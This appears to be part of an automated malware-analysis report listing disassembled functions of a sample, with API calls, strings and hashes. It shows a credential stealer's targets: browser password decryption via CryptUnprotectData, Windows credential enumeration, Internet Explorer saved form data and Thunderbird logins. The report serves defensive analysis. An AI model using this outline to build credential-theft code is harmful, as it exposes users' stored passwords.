                                                          • Instruction Fuzzy Hash: 36A2CB309142A9CBDF21EB64CC91BEDBBB5AF59300F1081E9E54967292DB704F98CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027BA81, Relevance: 20.1, APIs: 9, Strings: 2, Instructions: 844encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027BA86
                                                          • wsprintfA.USER32 ref: 0027BCD4
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027BE0C
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027BE21
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027C033
                                                            • Part of subcall function 002A489E: __EH_prolog.LIBCMT ref: 002A48A3
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0027C35D
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0027C3BF
                                                          • LocalFree.KERNEL32(?), ref: 0027C480
                                                            • Part of subcall function 002792DB: __EH_prolog.LIBCMT ref: 002792E0
                                                            • Part of subcall function 002792DB: LocalAlloc.KERNEL32(00000040,?), ref: 002793DC
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0027C43C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prologLocal_wcsstr$CryptDataDeallocateFreeUnprotect$Allocwsprintf
                                                          • String ID: "},$v10
                                                          • API String ID: 276673488-3916116036
                                                          • Opcode ID: 120779aabf27211566e63c25fd83205d35eca532f1c349c7001025ccfd5b3e1f
                                                          • Instruction ID: 8140bbe532ad5b2d7878e7b0663ea6510073aee253cfc2b561603b2b359b4bc0
                                                          • Opcode Fuzzy Hash: 120779aabf27211566e63c25fd83205d35eca532f1c349c7001025ccfd5b3e1f
                                                          • Instruction Fuzzy Hash: FF72CC30D14299DBDF21EFA4DC91AEEBBB5AF19300F1081E9E44973252DB705A98CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002944FB, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 318fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00294500
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00294616
                                                          • CloseHandle.KERNEL32(00000000), ref: 00294624
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00294660
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00294689
                                                          • CloseHandle.KERNEL32(00000000), ref: 00294690
                                                            • Part of subcall function 00279182: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 002791AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteH_prologReadSizeTransacted
                                                          • String ID: *(,+$.f|$=534$qk
                                                          • API String ID: 169828681-1410984133
                                                          • Opcode ID: 151a86fcde84b66e88986a632b013ff1339a43552643a8f1087c1315fd9267b8
                                                          • Instruction ID: a2006e4bcecc5db0e79dfe03871d46458b9064193e6756d9bd9b3f00212cd72a
                                                          • Opcode Fuzzy Hash: 151a86fcde84b66e88986a632b013ff1339a43552643a8f1087c1315fd9267b8
                                                          • Instruction Fuzzy Hash: 59D1EF30C15298CADF15EFA4C991BEDBBB4AF16300F5081E9D04A77242EB741B99CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004242AB, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 318fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 004242B0
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004243C6
                                                          • CloseHandle.KERNEL32(00000000), ref: 004243D4
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00424410
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00424439
                                                          • CloseHandle.KERNEL32(00000000), ref: 00424440
                                                            • Part of subcall function 00408F32: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,?,?,0000000F,00000000,00408E93), ref: 00408F45
                                                            • Part of subcall function 00408F32: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 00408F5C
                                                            • Part of subcall function 00408F32: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,0000000F,00000000,00408E93,?,?,?,00414AC4,00000000), ref: 00408F67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
                                                          • String ID: *(,+$.f|$=534$qk
                                                          • API String ID: 604483397-1410984133
                                                          • Opcode ID: 1456ec56e42e6c254b03673f68d66c7d671ba8003650361ffc65a4933b88a3b4
                                                          • Instruction ID: 0fe58ed68a282d90520b9192b80fc7b9b644e27c8e0c57f7aa62a0ea78e6e499
                                                          • Opcode Fuzzy Hash: 1456ec56e42e6c254b03673f68d66c7d671ba8003650361ffc65a4933b88a3b4
                                                          • Instruction Fuzzy Hash: 9BD1F230D012A8DADB25DBA5D990BEDBBB4AF55304F1041FED44977282DB381B8DCB29
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040C498, Relevance: 14.0, APIs: 9, Instructions: 467libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040C49D
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C4E8
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C51A
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C559
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C591
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C5C6
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C5F7
                                                          • GetProcAddress.KERNEL32(?,F2EFED61), ref: 0040C639
                                                          • wsprintfA.USER32 ref: 0040C69A
                                                            • Part of subcall function 0040EDCE: __EH_prolog.LIBCMT ref: 0040EDD3
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 0040CB20: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040CB4E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc$H_prolog$DeallocateIos_base_dtorstd::ios_base::_wsprintf
                                                          • String ID:
                                                          • API String ID: 3613913591-0
                                                          • Opcode ID: a9c1e22064faa7d57c285ce226cafe665fc47f026400c54c673a89f482017bf5
                                                          • Instruction ID: f1dcce83d1cb255206fe6d11c670426d6c1d5e4ab396ced2bca2acd871e80448
                                                          • Opcode Fuzzy Hash: a9c1e22064faa7d57c285ce226cafe665fc47f026400c54c673a89f482017bf5
                                                          • Instruction Fuzzy Hash: B512E030D04298DBDB11DFA8DC816EEBBB1BF59304F1091BEE48577292DB341A89CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A6B3, Relevance: 13.6, APIs: 3, Strings: 4, Instructions: 1333COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041A6B8
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041A6ED
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 00408ADD: __EH_prolog.LIBCMT ref: 00408AE2
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 00408DDD: ___std_fs_copy_file@12.LIBCPMT ref: 00408E01
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          • __fread_nolock.LIBCMT ref: 0041B0C2
                                                            • Part of subcall function 004206EE: __EH_prolog.LIBCMT ref: 004206F3
                                                            • Part of subcall function 0041E9E3: __EH_prolog.LIBCMT ref: 0041E9E8
                                                            • Part of subcall function 0041EA6B: __EH_prolog.LIBCMT ref: 0041EA70
                                                            • Part of subcall function 0041A507: __EH_prolog.LIBCMT ref: 0041A50C
                                                            • Part of subcall function 0041A507: _strlen.LIBCMT ref: 0041A579
                                                            • Part of subcall function 0041A507: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041A581
                                                            • Part of subcall function 00434DC9: __EH_prolog.LIBCMT ref: 00434DCE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$BinaryCryptFolderPathString___std_fs_copy_file@12__fread_nolock_strcat_strlen
                                                          • String ID: %$Profiles$ThunderBird$logins
                                                          • API String ID: 684813540-3248300823
                                                          • Opcode ID: d6666ea9ce23e85a7722c88b0e6c0a9e7d5a9fcaea37bddec8008dedb772e21a
                                                          • Instruction ID: 5c9def5883b4a74cc5656d88b2f1dc3098e90d7eda3ab740b258cad9a7fa4399
                                                          • Opcode Fuzzy Hash: d6666ea9ce23e85a7722c88b0e6c0a9e7d5a9fcaea37bddec8008dedb772e21a
                                                          • Instruction Fuzzy Hash: E1D29970D00268CBDB25DB69C890AEDBBB1AF59304F5081EED44977282DB385F89CF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00279FA2, Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 699COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00279FA7
                                                          • wsprintfA.USER32 ref: 0027A1B4
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027A48B
                                                            • Part of subcall function 00279182: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 002791AC
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 00279F61: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00279F8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DeallocateDeleteFileH_prologIos_base_dtorTransacted_wcsstrstd::ios_base::_wsprintf
                                                          • String ID: "},$v10
                                                          • API String ID: 3443179243-3916116036
                                                          • Opcode ID: 688636fe00cba6fe0f2b01164f53ce72fec384b45e57b41900c8091ba5b7a5db
                                                          • Instruction ID: b22111ff977f4b5afd795d60b45d1b98cc1edd1e0863cca66c4c503fca6729a2
                                                          • Opcode Fuzzy Hash: 688636fe00cba6fe0f2b01164f53ce72fec384b45e57b41900c8091ba5b7a5db
                                                          • Instruction Fuzzy Hash: 5252DF30C14298DFDF14EFA4CD91AEDBBB5BF59300F5081A9E40967292EB744A98CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002AD250, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 465COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /$UT
                                                          • API String ID: 0-1626504983
                                                          • Opcode ID: c20a79d2fdcf451f7391a0c813079a7532917de0c661a343bbfa4908f9ce9d16
                                                          • Instruction ID: b1ce55f12f98fb4f53aa25fd62d271b48db2da382f71fad6772a6efdff09a134
                                                          • Opcode Fuzzy Hash: c20a79d2fdcf451f7391a0c813079a7532917de0c661a343bbfa4908f9ce9d16
                                                          • Instruction Fuzzy Hash: 8902E371A283829FD724DF68D4807AAF7E5BF96304F14082EF48A87651DB74D868CB53
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004626F2, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456C8D
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456CC3
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004627FE
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00462847
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00462856
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0046289E
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004628BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                          • String ID: P6G
                                                          • API String ID: 949163717-4065964772
                                                          • Opcode ID: 0e33612c2e4d3ba696e4ee20619a1fcd151dc0f3764f17c0c170701cf150eb4e
                                                          • Instruction ID: 30f60f5b3195fc1a41b575ccbf29e8ea612a445bc61fca049934e8cac3b5cf5a
                                                          • Opcode Fuzzy Hash: 0e33612c2e4d3ba696e4ee20619a1fcd151dc0f3764f17c0c170701cf150eb4e
                                                          • Instruction Fuzzy Hash: A751A471A00605BBDB10EFA5CD45EBF73B8BF04705F14456BE900E7291FBB89A448B6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002937FF, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CredEnumerateW.ADVAPI32(0047D4AC,00000000,?,?), ref: 0029385F
                                                          • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 002938A5
                                                          • LocalFree.KERNEL32(?), ref: 002938CF
                                                          • AuditFree.ADVAPI32(?), ref: 002938E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Free$AuditCredCryptDataEnumerateLocalUnprotect
                                                          • String ID: J$abe2869f-9b47-4cd9-a358-c22904dba7f7
                                                          • API String ID: 1896015943-3474744795
                                                          • Opcode ID: ec2bb8940657ad16d484ce66efb9d2416c641838026b6464964e606d1d0f131d
                                                          • Instruction ID: 58d0f492072bedd5f8867f0dfa7636e05e4013c0fc335037e9606645e3ce6b2b
                                                          • Opcode Fuzzy Hash: ec2bb8940657ad16d484ce66efb9d2416c641838026b6464964e606d1d0f131d
                                                          • Instruction Fuzzy Hash: 03310875E10209EBDF20DF95C8849EEBBB8FF84710B10416AE811E3241E771AA15DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0046251D, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,;(F,00000002,00000000,?,?,?,0046283B,?,00000000), ref: 004625B6
                                                          • GetLocaleInfoW.KERNEL32(?,20001004,;(F,00000002,00000000,?,?,?,0046283B,?,00000000), ref: 004625DF
                                                          • GetACP.KERNEL32(?,?,0046283B,?,00000000), ref: 004625F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ;(F$ACP$OCP
                                                          • API String ID: 2299586839-1543003859
                                                          • Opcode ID: 85a5b8d19ec437d829d17e0d268efc380b5868f2c5ed493b49ce56c4e4a1892d
                                                          • Instruction ID: b0283cca99e959c1feecb82098218eb2f48169f4370686c1e5186f4d4a7dcd12
                                                          • Opcode Fuzzy Hash: 85a5b8d19ec437d829d17e0d268efc380b5868f2c5ed493b49ce56c4e4a1892d
                                                          • Instruction Fuzzy Hash: 7C210372B00900BADB30CF14CA21B9773A6BB54B94B56C426E80BD7210F7BADE41C75B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00281ABE, Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1630COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00281AC3
                                                            • Part of subcall function 00285B8A: _memcmp.LIBVCRUNTIME ref: 00285BAE
                                                          • GetDriveTypeA.KERNEL32(?,?,?,0047913B,0047913B), ref: 00281D09
                                                            • Part of subcall function 002816AD: ___std_fs_get_stats@16.LIBCPMT ref: 002816CD
                                                            • Part of subcall function 00281A09: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00281A45
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$CopyDriveEnvironmentFileTransactedTypeVariable___std_fs_get_stats@16_memcmp
                                                          • String ID: $0$C
                                                          • API String ID: 1071132504-317060204
                                                          • Opcode ID: 56a7beac0a5967cc935d744ce9515f1cf44bd6b3dcb671c17eca1506c314260b
                                                          • Instruction ID: bbc41ffe65d56067b7a6bf0004f7f359c90bc5836a77cd9e6ebb4c64c98209e6
                                                          • Opcode Fuzzy Hash: 56a7beac0a5967cc935d744ce9515f1cf44bd6b3dcb671c17eca1506c314260b
                                                          • Instruction Fuzzy Hash: D0E2EF34D22259DBCF14EFA4C991AEDB7B5AF14300F1081A9E44A772C2DB345BA9CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0046415B, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          • Opcode ID: 2966fa762916486d652a014e44bfc7879eeaffc76bdb1dbb5f6f14fde969aaad
                                                          • Instruction ID: 0642c07c721bf1e6f53cedfec76890c1312f3a0418d0ae2ebfb5072b9b49907c
                                                          • Opcode Fuzzy Hash: 2966fa762916486d652a014e44bfc7879eeaffc76bdb1dbb5f6f14fde969aaad
                                                          • Instruction Fuzzy Hash: 63C22771E046288BDF25CE28DD407EAB7B5EB89315F1541EBD80DE7240E778AE818F46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0028A903, Relevance: 10.1, APIs: 3, Strings: 2, Instructions: 1333COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028A908
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0028A93D
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 0027902D: ___std_fs_copy_file@12.LIBCPMT ref: 00279051
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          • __fread_nolock.LIBCMT ref: 0028B312
                                                            • Part of subcall function 0029093E: __EH_prolog.LIBCMT ref: 00290943
                                                            • Part of subcall function 0028EC33: __EH_prolog.LIBCMT ref: 0028EC38
                                                            • Part of subcall function 0028A757: __EH_prolog.LIBCMT ref: 0028A75C
                                                            • Part of subcall function 0028A757: _strlen.LIBCMT ref: 0028A7C9
                                                            • Part of subcall function 0028A757: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0028A7D1
                                                            • Part of subcall function 002A5019: __EH_prolog.LIBCMT ref: 002A501E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$BinaryCryptFolderPathString___std_fs_copy_file@12__fread_nolock_strlen
                                                          • String ID: %$Profiles
                                                          • API String ID: 1431793343-2189904706
                                                          • Opcode ID: d1448f04128af900de4b4b81af6423470293b790de712f8da01c85f912ee22d0
                                                          • Instruction ID: d420ad0fa1535250da2919fd63b9a010e6b2ee3e385880e2806978e3c2317a6a
                                                          • Opcode Fuzzy Hash: d1448f04128af900de4b4b81af6423470293b790de712f8da01c85f912ee22d0
                                                          • Instruction Fuzzy Hash: C1D2A630D252A98BDB25EF68C890BEDBBB5AF59300F5481EDD44963282DB305F98CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A497B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 002A49C3
                                                          • RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 002A49E2
                                                          • RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 002A4A1D
                                                          • RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 002A4A3E
                                                            • Part of subcall function 002B56E1: _free.LIBCMT ref: 002B56F4
                                                          Strings
                                                          • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 002A49C1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: QueryValue$CloseOpen_free
                                                          • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                          • API String ID: 3744367872-680441574
                                                          • Opcode ID: f7fe0857197da966d0c8a5dfdb1e554f14c8f5df143e4dbb937ca2853af20b8e
                                                          • Instruction ID: 1f46df69e098795d786019973ac2ee937285bd5056a106329dae036e8334af85
                                                          • Opcode Fuzzy Hash: f7fe0857197da966d0c8a5dfdb1e554f14c8f5df143e4dbb937ca2853af20b8e
                                                          • Instruction Fuzzy Hash: 2A31A47665020ABBEF20EF50DC80FAB7769EF85754F108025FD0496252EBB0DD208B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043472B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 00434773
                                                          • RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 00434792
                                                          • RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 004347CD
                                                          • RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 004347EE
                                                            • Part of subcall function 00445491: _free.LIBCMT ref: 004454A4
                                                          Strings
                                                          • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00434771
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: QueryValue$CloseOpen_free
                                                          • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                          • API String ID: 3744367872-680441574
                                                          • Opcode ID: f7fe0857197da966d0c8a5dfdb1e554f14c8f5df143e4dbb937ca2853af20b8e
                                                          • Instruction ID: 1264c85fb45064e9287e3ded0f8bbf719185c93e0c9dcfa83bc39c15431750b0
                                                          • Opcode Fuzzy Hash: f7fe0857197da966d0c8a5dfdb1e554f14c8f5df143e4dbb937ca2853af20b8e
                                                          • Instruction Fuzzy Hash: 75319335600209BBEF20DF50DC84FEBBB68EF89754F108126FD049A240E338EE408B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043604A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043604F
                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 0043606C
                                                            • Part of subcall function 0040EEB0: __EH_prolog.LIBCMT ref: 0040EEB5
                                                            • Part of subcall function 0040F61A: __EH_prolog.LIBCMT ref: 0040F61F
                                                            • Part of subcall function 0040F61A: std::locale::_Init.LIBCPMT ref: 0040F63D
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004361B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
                                                          • String ID: e{@$G
                                                          • API String ID: 3259846166-3907898668
                                                          • Opcode ID: 91e85941eb23e8f275ff468ba4af78083a7e917edc26e38c137da9d397c4eac1
                                                          • Instruction ID: 34debe2a00886157916b80fe4dbe55d4df18b524847ff4e8df24ffcd111740cd
                                                          • Opcode Fuzzy Hash: 91e85941eb23e8f275ff468ba4af78083a7e917edc26e38c137da9d397c4eac1
                                                          • Instruction Fuzzy Hash: 4F418E70D0025CCBDB11DFAAD945BEEFBB5AF48308F1081AAD80877251EB785A89CF55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D276D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,002D2A8B,00000002,00000000,?,?,?,002D2A8B,?,00000000), ref: 002D2806
                                                          • GetLocaleInfoW.KERNEL32(?,20001004,002D2A8B,00000002,00000000,?,?,?,002D2A8B,?,00000000), ref: 002D282F
                                                          • GetACP.KERNEL32(?,?,002D2A8B,?,00000000), ref: 002D2844
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP
                                                          • API String ID: 2299586839-711371036
                                                          • Opcode ID: 85a5b8d19ec437d829d17e0d268efc380b5868f2c5ed493b49ce56c4e4a1892d
                                                          • Instruction ID: a2f83e219b576ad062971ccdc76af146c7d623d3f293d88ff49faf4f682f9510
                                                          • Opcode Fuzzy Hash: 85a5b8d19ec437d829d17e0d268efc380b5868f2c5ed493b49ce56c4e4a1892d
                                                          • Instruction Fuzzy Hash: A921D332A20102E6EB308F14C901B97B3A6AF70B54B56C466E80ADB310F732DD59E360
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D1FE1, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • GetACP.KERNEL32(?,?,?,?,?,?,002C52B0,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 002D20A2
                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,002C52B0,?,?,?,00000055,?,-00000050,?,?), ref: 002D20CD
                                                          • _wcschr.LIBVCRUNTIME ref: 002D2161
                                                          • _wcschr.LIBVCRUNTIME ref: 002D216F
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 002D2230
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
